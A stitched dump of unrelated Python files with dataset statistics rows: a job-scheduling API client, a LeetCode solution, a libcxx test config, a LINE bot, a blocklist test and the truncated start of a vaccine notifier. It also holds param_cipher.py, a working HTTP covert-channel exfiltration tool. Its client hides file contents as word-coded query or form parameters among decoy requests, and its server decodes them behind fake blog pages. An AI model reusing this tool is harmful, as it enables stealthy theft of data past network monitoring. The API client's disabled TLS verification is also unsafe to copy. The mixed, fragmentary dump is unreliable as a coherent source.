self.logger.debug("Job successfully deleted.")
else:
raise InvalidResponseCodeException("Response code invalid, the expected response code is {0}, "
"the actual response code is {1}".format(200, response.status_code))
return None
except JobNotFoundException as err:
self.logger.debug("Job not found, error {0}".format(err))
def get_list(self, workspace_id, per_page=50):
"""
Get a list of all jobs in a workspace.
:param int workspace_id: ID of the workspace.
:param int per_page: Maximum number to fetch with each API call.
:return: List of jobs' metadata.
:rtype: list of dict
Example::
>>> all_jobs = session.job.get_list(workspace_id = 1672)
"""
jobs_list = None
url = "{0}/workspaces/{1}/jobs".format(self.base_url, workspace_id)
url = self._add_token_to_url(url)
page_current = 0
if self.session.headers.get("Content-Type") is not None:
self.session.headers.pop("Content-Type")
while True:
payload = {
"per_page": per_page,
"page": page_current + 1,
}
job_list_response = self.session.get(url, data=json.dumps(payload), verify=False).json()
page_total = job_list_response['pagination']['total']
page_current = job_list_response['pagination']['page']
if jobs_list:
jobs_list.extend(job_list_response['response'])
else:
jobs_list = job_list_response['response']
if page_total == page_current:
break
return jobs_list
def get(self, workspace_id, job_id):
"""
Get one job's metadata.
:param int workspace_id: ID of the workspace that contains the job.
:param str job_id: ID of the job.
:return: Selected job's metadata.
:rtype: dict
Example::
>>> job_info = session.job.get(workspace_id = 1672, job_id = 675)
"""
url = "{0}/workspaces/{1}/jobs/{2}".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
if self.session.headers.get("Content-Type") is not None:
self.session.headers.pop("Content-Type")
r = self.session.get(url, verify=False)
job_response = r.json()
try:
if job_response['response']:
self.logger.debug("Found job ID: <{0}>".format(job_id))
return job_response['response']
else:
raise JobNotFoundException("Job ID: <{0}> not found".format(job_id))
except Exception as err:
raise JobNotFoundException("Job ID: <{0}> not found".format(job_id))
def get_id(self, workspace_id, job_name):
"""
Gets the job ID.
:param int workspace_id: ID of the workspace the job is in.
:param str job_name: Name of the job.
:return: ID of the job.
:rtype: int
Example::
>>> job_id = session.job.get_id(workspace_id = 1672, job_name = "DemoJob")
>>> print(job_id)
675
"""
job_list = self.get_list(workspace_id)
for job_info in job_list:
if job_info['name'] == job_name:
return job_info['id']
raise JobNotFoundException("Job {0} not found".format(job_name))
def run(self, job_id):
"""
Run a job.
:param int job_id: ID of the job.
:return: HTTP response.
:rtype: response
Example::
>>> session.job.run(job_id = 675)
"""
url = "{0}/jobs/{1}/run?saveResult=true".format(self.base_url, job_id)
self.session.headers.update({"x-token": self.token})
self.session.headers.update({"Content-Type": "application/json"})
response = self.session.post(url, timeout=30)
self.session.headers.pop("Content-Type")
self.logger.debug(response.content)
if response.status_code == 202:
job = response.json()['response']
self.logger.debug("Job with ID: <{0}> run started".format(job['id']))
return job
else:
raise RunJobFailureException("Running job with ID: <{0}> failed with status code {1}".
format(job_id, response.status_code))
class Task(AlpineObject):
"""
A class for interacting with job tasks.
"""
def __init__(self, base_url, session, token):
super(Job.Task, self).__init__(base_url, session, token)
self.chorus_domain = '{uri.scheme}://{uri.netloc}/'.format(uri=urlparse(self.base_url))
self.logger.debug(self.chorus_domain)
self.alpine_base_url = urljoin(self.chorus_domain,
"alpinedatalabs/api/{0}/json".format(self._alpine_api_version))
self.logger.debug("alpine_base_url is: {0}".format(self.alpine_base_url))
def create(self, workspace_id, job_id, workfile_id, task_type=None):
"""
Add a new task to an existing job using an existing workfile.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job to which the task is to be added.
:param int workfile_id: ID of the workfile to be added as a task.
:param str task_type: Task type. Use the `Workspace.Stage` object for convenience.
The default is "run_work_flow".
:return: Metadata of the new task.
:rtype: dict
Example::
>>> session.job.task.create(workspace_id = 1672, job_id = 675, workfile_id = 823)
"""
if task_type is None:
task_type = "run_work_flow"
self.logger.debug("The job ID: <{0}>".format(job_id))
url = "{0}/workspaces/{1}/jobs/{2}/job_tasks".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
self.logger.debug("The URL that we will be posting is: {0}".format(url))
self.session.headers.update({"Content-Type": "application/x-www-form-urlencoded"})
# constructing the payload for adding a task
payload = {"action": task_type, "workfile_id": workfile_id}
self.logger.debug("POSTing payload {0} to URL {1}".format(payload, url))
response = self.session.post(url, data=payload, verify=False)
self.logger.debug(
"Received response code {0} with reason {1}...".format(response.status_code, response.reason))
try:
return response.json()['response']
except KeyError:
return response.json()
def delete(self, workspace_id, job_id, task_id):
"""
Delete a task from a job.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job that has the task to be deleted.
:param int task_id: ID of the task.
:return: None
:rtype: NoneType
:exception TaskNotFoundException: The job does not exist.
:exception InvalidResponseCodeException: The request got an unexpected HTTP status code in response (not 200 OK).
Example::
>>> session.job.task.delete(workspace_id = 1672, job_id = 675, task_id = 344)
"""
try:
self.logger.debug("Constructing the URL for task deletion")
url = "{0}/workspaces/{1}/jobs/{2}/job_tasks/{3}".format(self.base_url, workspace_id, job_id, task_id)
url = self._add_token_to_url(url)
self.logger.debug("We have constructed the URL for task deletion. It is: {0}".format(url))
response = self.session.delete(url)
self.logger.debug(
"Received response code {0} with reason {1}...".format(response.status_code, response.reason))
if response.status_code == 200:
self.logger.debug("Task successfully deleted.")
else:
raise InvalidResponseCodeException("Response code invalid. the expected response code is {0}, "
"the actual response code is {1}".format(200,
response.status_code))
return None
except TaskNotFoundException as err:
self.logger.debug("Task not found, error {0}".format(err))
def get_list(self, workspace_id, job_id):
"""
Get a list of all tasks in a job.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job.
:return: List of all tasks in the job.
:rtype: list of dict
Example::
>>> session.job.task.get_list(workspace_id = 1672, job_id = 675);
"""
self.logger.debug("Getting the job ID: {0}".format(job_id))
# Constructing the URL to retrieve the contents
url = "{0}/workspaces/{1}/jobs/{2}".format(self.base_url, workspace_id, job_id)
url = self._add_token_to_url(url)
if self.session.headers.get("Content-Type") is not None:
self.session.headers.pop("Content-Type")
# Doing a HTTP GET
self.logger.debug("POSTing a HTTP GET to retrieve the tasks on the workspace.")
response = self.session.get(url)
self.logger.debug(
"Received response code {0} with reason {1}...".format(response.status_code, response.reason))
task_list = response.json()['response']['tasks']
return task_list
def get(self, workspace_id, job_id, task_id):
"""
Return metadata of one task.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job.
:param int task_id: ID of the task.
:return: Selected task's metadata.
:rtype: dict
Example::
>>> session.job.task.get(workspace_id = 1672, job_id = 675, task_id = 344)
"""
task_list = self.get_list(workspace_id, job_id)
for task in task_list:
if task['id'] == task_id:
self.logger.debug(
"Found the task ID: <{0}>".format(task_id))
return task
raise TaskNotFoundException("The task ID: <{0}> does not exist".format(task_id))
def get_id(self, workspace_id, job_id, task_name):
"""
Return the ID of a task.
:param int workspace_id: ID of the workspace.
:param int job_id: ID of the job.
:param str task_name: Name of the task.
:return: ID of the task.
:rtype: int
Example::
>>> session.job.task.get_id(workspace_id = 1672, job_id = 675, task_name = "Run test2")
344
"""
task_list = self.get_list(workspace_id, job_id)
for task in task_list:
if task['name'] == task_name:
return int(task['id'])
# return None
raise TaskNotFoundException("The task with name: {0} does not exist".format(task_name))
class ScheduleType(object):
"""
Convenience strings for schedule types.
"""
OnDemand = "on_demand"
Monthly = "months"
Weekly = "weeks"
Daily = "days"
Hourly = "hours"
class TaskType(object):
"""
Convenience strings for task types.
"""
RunWorkflow = "run_work_flow"
RunSQLFile = "run_sql_workfile"
RunNotebook = "notebook"
| 39.63466 | 125 | 0.568424 | 2,059 | 16,924 | 4.530355 | 0.127732 | 0.026265 | 0.038593 | 0.020262 | 0.552101 | 0.478666 | 0.428066 | 0.400086 | 0.36503 | 0.34048 | 0 | 0.015509 | 0.329473 | 16,924 | 426 | 126 | 39.7277 | 0.806486 | 0.289175 | 0 | 0.306533 | 0 | 0 | 0.17959 | 0.033244 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070352 | false | 0 | 0.050251 | 0.005025 | 0.21608 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b88af3896dc7ac76c3bd00bb55fe5410335259b | 11,276 | py | Python | methods/http/param_cipher.py | bbhunter/lollipopz | ed6945eab4f017b1b6b8d3d4ec7a3efc1108cd20 | [
"MIT"
] | null | null | null | methods/http/param_cipher.py | bbhunter/lollipopz | ed6945eab4f017b1b6b8d3d4ec7a3efc1108cd20 | [
"MIT"
] | null | null | null | methods/http/param_cipher.py | bbhunter/lollipopz | ed6945eab4f017b1b6b8d3d4ec7a3efc1108cd20 | [
"MIT"
] | null | null | null | import random
import urllib
from scapy.layers import http
import exfilkit as lpz
from exfilkit import methods
ENCODING_TABLE = {
'0': 'radio',
'1': 'spoke',
'2': 'thick',
'3': 'human',
'4': 'atom',
'5': 'effect',
'6': 'electric',
'7': 'expect',
'8': 'bone',
'9': 'rail',
'a': 'imagine',
'b': 'provide',
'c': 'agree',
'd': 'thus',
'e': 'gentle',
'f': 'woman',
'g': 'captain',
'h': 'guess',
'i': 'necessary',
'j': 'sharp',
'k': 'wing',
'l': 'create',
'm': 'neighbor',
'n': 'wash',
'o': 'condition',
'p': 'feed',
'q': 'tool',
'r': 'total',
's': 'basic',
't': 'smell',
'u': 'valley',
'v': 'nor',
'w': 'double',
'x': 'seat',
'y': 'continue',
'z': 'block',
'A': 'chart',
'B': 'hat',
'C': 'sell',
'D': 'success',
'E': 'company',
'F': 'subtract',
'G': 'event',
'H': 'particular',
'I': 'deal',
'J': 'swim',
'K': 'term',
'L': 'opposite',
'M': 'wife',
'N': 'shoe',
'O': 'shoulder',
'P': 'spread',
'Q': 'arrange',
'R': 'camp',
'S': 'invent',
'T': 'cotton',
'U': 'born',
'V': 'determine',
'W': 'quart',
'X': 'nine',
'Y': 'truck',
'Z': 'noise',
'!': 'level',
'"': 'chance',
'#': 'gather',
'$': 'shop',
'%': 'stretch',
'&': 'throw',
"'": 'shine',
'(': 'property',
')': 'column',
'*': 'molecule',
'+': 'select',
',': 'wrong',
'-': 'gray',
'.': 'repeat',
'/': 'require',
':': 'broad',
';': 'prepare',
'<': 'salt',
'=': 'nose',
'>': 'plural',
'?': 'anger',
'@': 'claim',
'[': 'bat',
'\\': 'rather',
']': 'crowd',
'^': 'corn',
'_': 'compare',
'`': 'poem',
'{': 'history',
'|': 'bell',
'}': 'depend',
'~': 'meat',
' ': 'rub',
'\t': 'tube',
'\n': 'addressing',
'\r': 'corner',
}
RANDOM_WORDS = (
'abortion',
'abuse',
'across',
'addiction',
'adults',
'advantage',
'adventure',
'advertisement',
'advised',
'aids',
'allow',
'altogether',
'amber',
'antivirus',
'antology',
'anxious',
'anybody',
'appear',
'appearance',
'appears',
'applicable',
'approval',
'approve',
'approximately',
'assembly',
'assistant',
'assisted',
'attach',
'attack',
'automatically',
'ave',
'avenue',
'aware',
'bangladesh',
'baseball',
'basketball',
'bend',
'birth',
'blast',
'boat',
'botswana',
'bound',
'box',
'brain',
'brake',
'break',
'breakfast',
'bridge',
'brother',
'brunswick',
'calcium',
'calgary',
'candles',
'carry',
'cast',
'centers',
'chain',
'charge',
'chose',
'chrome',
'classical',
'clips',
'closed',
'clubs',
'codes',
'compared',
'comparison',
'completely',
'compound',
'computing',
'concluded',
'confidence',
'congo',
'constitute',
'contacts',
'counter',
'covers',
'criminal',
'damage',
'decided',
'dedicated',
'define',
'delays',
'delete',
'demonstration',
'des',
'designs',
'desperate',
'determined',
'developer',
'dialog',
'died',
'difference',
'direction',
'disc',
'discounted',
'divine',
'dog',
'dollar',
'domestic',
'draft',
'dream',
'earlier',
'ecology',
'eight',
'electrical',
'element',
'ends',
'enhancement',
'equal',
'evening',
'extended',
'extension',
'exterior',
'facts',
'failure',
'faith',
'falls',
'false',
'felt',
'field',
'fill',
'films',
'flag',
'floor',
'flower',
'follows',
'forces',
'fort',
'funny',
'gamma',
'gene',
'generally',
'glen',
'golden',
'gone',
'governmental',
'graduation',
'graphic',
'greatest',
'greeting',
'harry',
'harvest',
'hawaii',
'headlines',
'health',
'hello',
'hentai',
'holding',
'houston',
'hudson',
'iceland',
'icon',
'identified',
'identify',
'inch',
'indiana',
'indians',
'institutions',
'intensity',
'interactive',
'interim',
'isolated',
'issued',
'jackson',
'jesus',
'justice',
'keeping',
'kinds',
'kong',
'lab',
'land',
'laser',
'leaders',
'leadership',
'legs',
'licenses',
'lighting',
'locally',
'maintain',
'manage',
'manufactured',
'manufacturers',
'matching',
'meeting',
'membrane',
'mental',
'minnesota',
'missing',
'moment',
'moms',
'morocco',
'mothers',
'mouse',
'moved',
'movement',
'named',
'nascar',
'native',
'newport',
'newsletters',
'nuclear',
'objects',
'obtained',
'offering',
'olive',
'oliver',
'ontario',
'opening',
'opinions',
'oregon',
'owned',
'pair',
'pairs',
'pardon',
'parking',
'passed',
'pattern',
'personnel',
'pickup',
'placed',
'plants',
'plastic',
'played',
'pocket',
'pole',
'portable',
'posters',
'powerful',
'prague',
'preservation',
'previews',
'printing',
'priority',
'private',
'procedure',
'produce',
'professionals',
'profit',
'promote',
'quarter',
'quietly',
'racing',
'rain',
'ranges',
'rank',
'reach',
'readers',
'recipes',
'recommendations',
'refused',
'religious',
'removing',
'requests',
'reserve',
'returned',
'russia',
'sacred',
'sailing',
'satisfied',
'savings',
'scored',
'seattle',
'senate',
'sensitivity',
'separate',
'sequence',
'sexual',
'share',
'shield',
'shirts',
'signal',
'single',
'sitemap',
'smiling',
'snow',
'somewhat',
'sorry',
'soul',
'spider',
'sponsor',
'springfield',
'stated',
'statements',
'stats',
'steps',
'stone',
'streaming',
'supper',
'supplied',
'syndicate',
'synthesis',
'tables',
'taxes',
'teams',
'technological',
'theatre',
'tommy',
'tourism',
'trails',
'tried',
'truth',
'turned',
'undefined',
'unemployment',
'utils',
'variable',
'variations',
'venues',
'verizon',
'viewed',
'virus',
'warranty',
'watched',
'weather',
'weekend',
'wellness',
'whenever',
'wholesale',
'williams',
'wisconsin',
'workshop',
'worst',
'writing',
'yesterday',
)
ENCODING_TABLE_INV = {v: k for k, v in ENCODING_TABLE.items()}
VALUES = (
'true',
'false',
'0',
'1',
)
def encode(value):
value = str(value)
result = ''
for c in value:
result += '&{}={}'.format(ENCODING_TABLE[c], random.choice(VALUES))
return result[1:]
def decode(value):
result = ''
words = value.split('&')
for w in words:
try:
result += ENCODING_TABLE_INV[w.split('=')[0]]
except KeyError:
break
return result
class Server(methods.HTTPServer):
RESPONSE_200 = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: text/html\r\n'
'Access-Control-Allow-Origin: *\r\n'
'Last-Modified: Wed, 01 Jan 2020 00:00:00 GMT\r\n'
'Connection: close\r\n'
'Date: {}\r\n'
'Pragma: no-cache\r\n'
'Content-Length: {}\r\n'
'Server: Apache\r\n\r\n'
)
RESPONSE_404 = (
'HTTP/1.1 404 Not Found\r\n'
'Content-Type: text/html\r\n'
'Access-Control-Allow-Origin: *\r\n'
'Last-Modified: Wed, 01 Jan 2020 00:00:00 GMT\r\n'
'Connection: close\r\n'
'Date: {}\r\n'
'Pragma: no-cache\r\n'
'Content-Length: {}\r\n'
'Server: Apache\r\n\r\n'
)
def response_200(self):
with open('templates/html/blog/article.html') as fil:
content = fil.read()
return self.RESPONSE_200.format(self.date_now_rfc_1123(), len(content)) + content
def response_404(self):
with open('templates/html/blog/404.html') as fil:
content = fil.read()
return self.RESPONSE_404.format(self.date_now_rfc_1123(), len(content)) + content
def handle(self, request, client_address):
data = self.receive(request)
try:
http_request = http.HTTPRequest(data)
except ValueError:
lpz.logger.debug(f'-> Failed to parse: {data}')
else:
encrypted = self.get_payload(http_request)
if encrypted:
decrypted = decode(encrypted).encode('utf8')
if decrypted:
lpz.logger.info(f'-> Encrypted data: {encrypted}')
lpz.logger.info(f'-> Decrypted data: {decrypted}')
self.output_write(decrypted)
else:
lpz.logger.info(f'-> Nothing to decrypt...')
url = urllib.parse.urlparse(http_request.Path)
if url.path == b'/':
request.sendall(self.response_200().encode('utf8'))
else:
request.sendall(self.response_404().encode('utf8'))
lpz.logger.info(f'-> Sent response to {client_address}')
class GETServer(Server):
def get_payload(self, request):
encrypted = None
if request.Method.decode() == 'GET':
encrypted = request.Path.decode()[2:]
return encrypted
class POSTServer(Server):
def get_payload(self, request):
encrypted = None
if request.Method.decode() == 'POST':
encrypted = request.payload.load.decode()
return encrypted
class Client(methods.TCPClient):
CHUNK_SIZE = 10
REQUEST_HTTP = None
EOT = b'\r\n\r\n'
def execute(self):
infile = self.args['infile'].read().decode('utf8')
queue = []
chunks = [infile[i: i + self.CHUNK_SIZE] for i in range(0, len(infile), self.CHUNK_SIZE)]
for chunk in chunks:
lpz.logger.debug(f'Sending "{chunk}"')
decoy_no = random.randint(1, self.RANDOM_DECOY)
for i in range(1, decoy_no):
words = [random.choice(RANDOM_WORDS) for i in range(1, self.CHUNK_SIZE)]
output = '&'.join(['{}={}'.format(w, random.choice(VALUES)) for w in words])
queue.append(output)
queue.append(encode(chunk))
for msg in queue:
self.send(self.prepare_data(msg))
class GETClient(Client):
REQUEST_HTTP = (
'GET /?{} HTTP/1.1\r\n\r\n'
)
def prepare_data(self, data):
return self.REQUEST_HTTP.format(data).encode('utf8')
class POSTClient(Client):
REQUEST_HTTP = (
'POST / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: {}\r\n\r\n'
'{}\r\n\r\n'
)
def prepare_data(self, data):
return self.REQUEST_HTTP.format(len(data), data).encode('utf8')
| 19.079526 | 97 | 0.485012 | 1,073 | 11,276 | 5.05219 | 0.555452 | 0.011068 | 0.003874 | 0.005165 | 0.154031 | 0.145176 | 0.130972 | 0.130972 | 0.130972 | 0.115846 | 0 | 0.012943 | 0.314828 | 11,276 | 590 | 98 | 19.111864 | 0.688713 | 0 | 0 | 0.067029 | 0 | 0 | 0.335669 | 0.013569 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018116 | false | 0.001812 | 0.009058 | 0.003623 | 0.065217 | 0.001812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b89275a0c09b79fb0e333962752c95ab1981d95 | 1,422 | py | Python | test.py | itsmahadi007/leet_code | dafbf10c02d163ef69c8bcda26f4f67949e1170e | [
"MIT"
] | null | null | null | test.py | itsmahadi007/leet_code | dafbf10c02d163ef69c8bcda26f4f67949e1170e | [
"MIT"
] | null | null | null | test.py | itsmahadi007/leet_code | dafbf10c02d163ef69c8bcda26f4f67949e1170e | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
from typing import Optional
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def solver(self, r1, r2):
if r1 == None and r2 == None:
return None
if r1 and r2:
root = TreeNode(r1.val + r2.val)
root.left = self.solver(r1.left, r2.left)
root.right = self.solver(r1.right, r2.right)
return root
elif r1 == None:
return r2
else:
return r1
def mergeTrees(
self, root1: Optional[TreeNode], root2: Optional[TreeNode]
) -> Optional[TreeNode]:
return self.solver(root1, root2)
# in inorder
def inorder(node):
if not node:
return
# first recur on left child
inorder(node.left)
# then print the data of node
print(node.data, end=" ")
# now recur on right child
inorder(node.right)
def main():
root1 = TreeNode(1)
root1.left = TreeNode(3)
root1.right = TreeNode(2)
root1.left.left = TreeNode(5)
root2 = TreeNode(2)
root2.left = TreeNode(1)
root2.right = TreeNode(3)
root2.left.right = TreeNode(4)
root2.right.right = TreeNode(7)
s = Solution()
root3 = s.mergeTrees(root1, root2)
print("The Merged Binary Tree is:")
inorder(root3)
main()
| 21.223881 | 66 | 0.585091 | 187 | 1,422 | 4.427807 | 0.31016 | 0.062802 | 0.028986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04264 | 0.307314 | 1,422 | 66 | 67 | 21.545455 | 0.79797 | 0.087201 | 0 | 0 | 0 | 0 | 0.020898 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.022727 | 0.022727 | 0.318182 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8945c7fa951796c85d83a1615cc0df86de506d | 1,919 | py | Python | test/libcxx/ndk/test/config.py | AOSiP/platform_external_libcxx | eb2115113f10274c0d25523ba44c3c7373ea3209 | [
"MIT"
] | 5 | 2020-12-19T06:56:06.000Z | 2022-01-09T01:28:42.000Z | test/libcxx/ndk/test/config.py | AOSiP/platform_external_libcxx | eb2115113f10274c0d25523ba44c3c7373ea3209 | [
"MIT"
] | 1 | 2021-09-27T06:00:40.000Z | 2021-09-27T06:00:40.000Z | test/libcxx/ndk/test/config.py | AOSiP/platform_external_libcxx | eb2115113f10274c0d25523ba44c3c7373ea3209 | [
"MIT"
] | 14 | 2017-01-21T00:56:32.000Z | 2022-02-24T11:27:38.000Z | import os
import libcxx.test.config
import libcxx.android.test.format
class Configuration(libcxx.test.config.Configuration):
def __init__(self, lit_config, config):
super(Configuration, self).__init__(lit_config, config)
self.cxx_under_test = None
self.cxx_template = None
self.link_template = None
def configure(self):
self.configure_cxx()
self.configure_triple()
self.configure_src_root()
self.configure_obj_root()
self.configure_cxx_library_root()
self.configure_compile_flags()
self.configure_link_flags()
self.configure_features()
def configure_link_flags(self):
self.link_flags.append('-nodefaultlibs')
# Configure libc++ library paths.
self.link_flags.append('-L' + self.cxx_library_root)
# Add libc_ndk's output path to the library search paths.
libdir = '{}/obj/STATIC_LIBRARIES/libc_ndk_intermediates'.format(
os.getenv('ANDROID_PRODUCT_OUT'))
self.link_flags.append('-L' + libdir)
self.link_flags.append('-lc++_ndk')
self.link_flags.append('-lc_ndk')
self.link_flags.append('-lc')
def configure_features(self):
self.config.available_features.add('long_tests')
def get_test_format(self):
cxx_template = ' '.join(
self.compile_flags + ['-c', '-o', '%OUT%', '%SOURCE%'])
link_template = ' '.join(
['-o', '%OUT%', '%SOURCE%'] + self.compile_flags + self.link_flags)
tmp_dir = getattr(self.config, 'device_dir', '/data/local/tmp/')
return libcxx.android.test.format.TestFormat(
self.cxx,
self.libcxx_src_root,
self.obj_root,
cxx_template,
link_template,
tmp_dir,
getattr(self.config, 'timeout', '300'),
exec_env={'LD_LIBRARY_PATH': tmp_dir})
| 33.086207 | 79 | 0.625326 | 227 | 1,919 | 4.986784 | 0.30837 | 0.071555 | 0.080389 | 0.100707 | 0.136926 | 0.060954 | 0.060954 | 0.060954 | 0.060954 | 0.060954 | 0 | 0.002085 | 0.25013 | 1,919 | 57 | 80 | 33.666667 | 0.784573 | 0.045336 | 0 | 0 | 0 | 0 | 0.107709 | 0.02515 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.068182 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b898d9bc24faf9e5765013e37fd2996b10a93b4 | 2,341 | py | Python | main.py | uncleben006/ptt-stock-vane | f55951eded377cc2f52fb9b98fc57c04b3ead36f | [
"MIT"
] | 1 | 2021-01-11T06:56:59.000Z | 2021-01-11T06:56:59.000Z | main.py | uncleben006/ptt-stock-vane | f55951eded377cc2f52fb9b98fc57c04b3ead36f | [
"MIT"
] | null | null | null | main.py | uncleben006/ptt-stock-vane | f55951eded377cc2f52fb9b98fc57c04b3ead36f | [
"MIT"
] | null | null | null | import json
from controller import follow, postback, message, cron, image
from datetime import datetime
from flask import Flask, request, abort, render_template
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent,
FollowEvent,
PostbackEvent,
TextMessage,
ImageMessage
)
from config import handler
from helper.util import get_comment
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index_html():
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
return '<h1>You have access the server successfully</h1><br>'+dt_string
@app.route('/cron', methods=['GET'])
def cron_job():
print('start a cron job.')
cron.job()
return '<h1>You have finished the cron job successfully</h1>'
@app.route('/comments', methods=['GET'])
def company_comments():
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
company = request.args.get('company')
with open( 'data/company_dict.json', 'r' ) as read_file:
dict_data = json.load( read_file )
if start_date and end_date:
result = get_comment(start_date, end_date, company)
else:
return "請輸入時間區間"
return render_template( "comments.html", result=result, dict_data=dict_data )
@app.route("/callback", methods=['POST'])
def callback():
# line message 的 headers
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# handle webhook body
try:
# 將 body 跟 signature 拿來確認消息的合法性
# 另外還有一個用途,轉發給後續的業務邏輯
handler.handle( body, signature )
except InvalidSignatureError:
print("Invalid signature. Please check your channel access token/channel secret.")
abort(400)
return 'OK'
@handler.add( MessageEvent, message=TextMessage )
def handle_message(event):
message.handle(event)
@handler.add( MessageEvent, message=ImageMessage )
def handle_image_message(event):
image.handle(event)
@handler.add( FollowEvent )
def handle_follow(event):
follow.handle(event)
@handler.add( PostbackEvent )
def handle_post(event):
postback.handle(event)
if __name__ == "__main__":
app.run() | 25.725275 | 90 | 0.692012 | 300 | 2,341 | 5.26 | 0.383333 | 0.020279 | 0.024715 | 0.039924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00368 | 0.187527 | 2,341 | 91 | 91 | 25.725275 | 0.825973 | 0.064502 | 0 | 0 | 0 | 0 | 0.163004 | 0.019689 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.328125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8b223b7c31de5945dad6e3558f8e2424ffcf2e | 307 | py | Python | tests/test_parser.py | threatlead/blocklistde | fe3649fac2a2a59d5fadced1eecfcb2f3b32781c | [
"MIT"
] | null | null | null | tests/test_parser.py | threatlead/blocklistde | fe3649fac2a2a59d5fadced1eecfcb2f3b32781c | [
"MIT"
] | null | null | null | tests/test_parser.py | threatlead/blocklistde | fe3649fac2a2a59d5fadced1eecfcb2f3b32781c | [
"MIT"
] | null | null | null | from .context import blocklistde
import unittest
class ConnectTestSuite(unittest.TestCase):
def test_ip_list(self):
ip = blocklistde.BlocklistDe.ssh()
self.assertGreater(len(ip), 10, 'Found a total of {0} ipaddresses'.format(len(ip)))
if __name__ == '__main__':
unittest.main()
| 21.928571 | 91 | 0.700326 | 38 | 307 | 5.394737 | 0.710526 | 0.04878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011905 | 0.179153 | 307 | 13 | 92 | 23.615385 | 0.801587 | 0 | 0 | 0 | 0 | 0 | 0.130293 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8c98b7a0da2c7b24385ad368e7947606ef9b7d | 16,016 | py | Python | vaccinator.py | vikas-kundu/vaccinator | b2621f6d3fb41b0405e56226a7ce0559f321e766 | [
"MIT"
] | 2 | 2021-05-05T05:07:52.000Z | 2021-05-05T22:35:12.000Z | vaccinator.py | vikas-kundu/vaccinator | b2621f6d3fb41b0405e56226a7ce0559f321e766 | [
"MIT"
] | null | null | null | vaccinator.py | vikas-kundu/vaccinator | b2621f6d3fb41b0405e56226a7ce0559f321e766 | [
"MIT"
] | null | null | null | print(r"""
______
<((((((\\\
/ . }\
;--..--._|}
(\ '--/\--' )
\\ | '-' :'|
\\ . -==- .-|
\\ \.__.' \--._
[\\ __.--| // _/'--.
\ \\ .'-._ ('-----'/ __/ \
\ \\ / __>| | '--. |
\ \\ | \ | / / /
\ '\ / \ | | _/ /
\ \ \ | | / /
\ \ \ /
__ __ _____ _____ _____ _ _ _______ ____ _____
\ \ / /\ / ____/ ____|_ _| \ | | /\|__ __/ __ \| __ \
\ \ / / \ | | | | | | | \| | / \ | | | | | | |__) |
\ \/ / /\ \| | | | | | | . ` | / /\ \ | | | | | | _ /
\ / ____ \ |___| |____ _| |_| |\ |/ ____ \| | | |__| | | \ \
\/_/ \_\_____\_____|_____|_| \_/_/ \_\_| \____/|_| \_\
Hasta La Vista Corona...
""")
import smtplib
import ssl
import sys
import re
import time
import json
import argparse
from datetime import date
from datetime import datetime
# Not part of standard lib
import requests as r
from plyer import notification
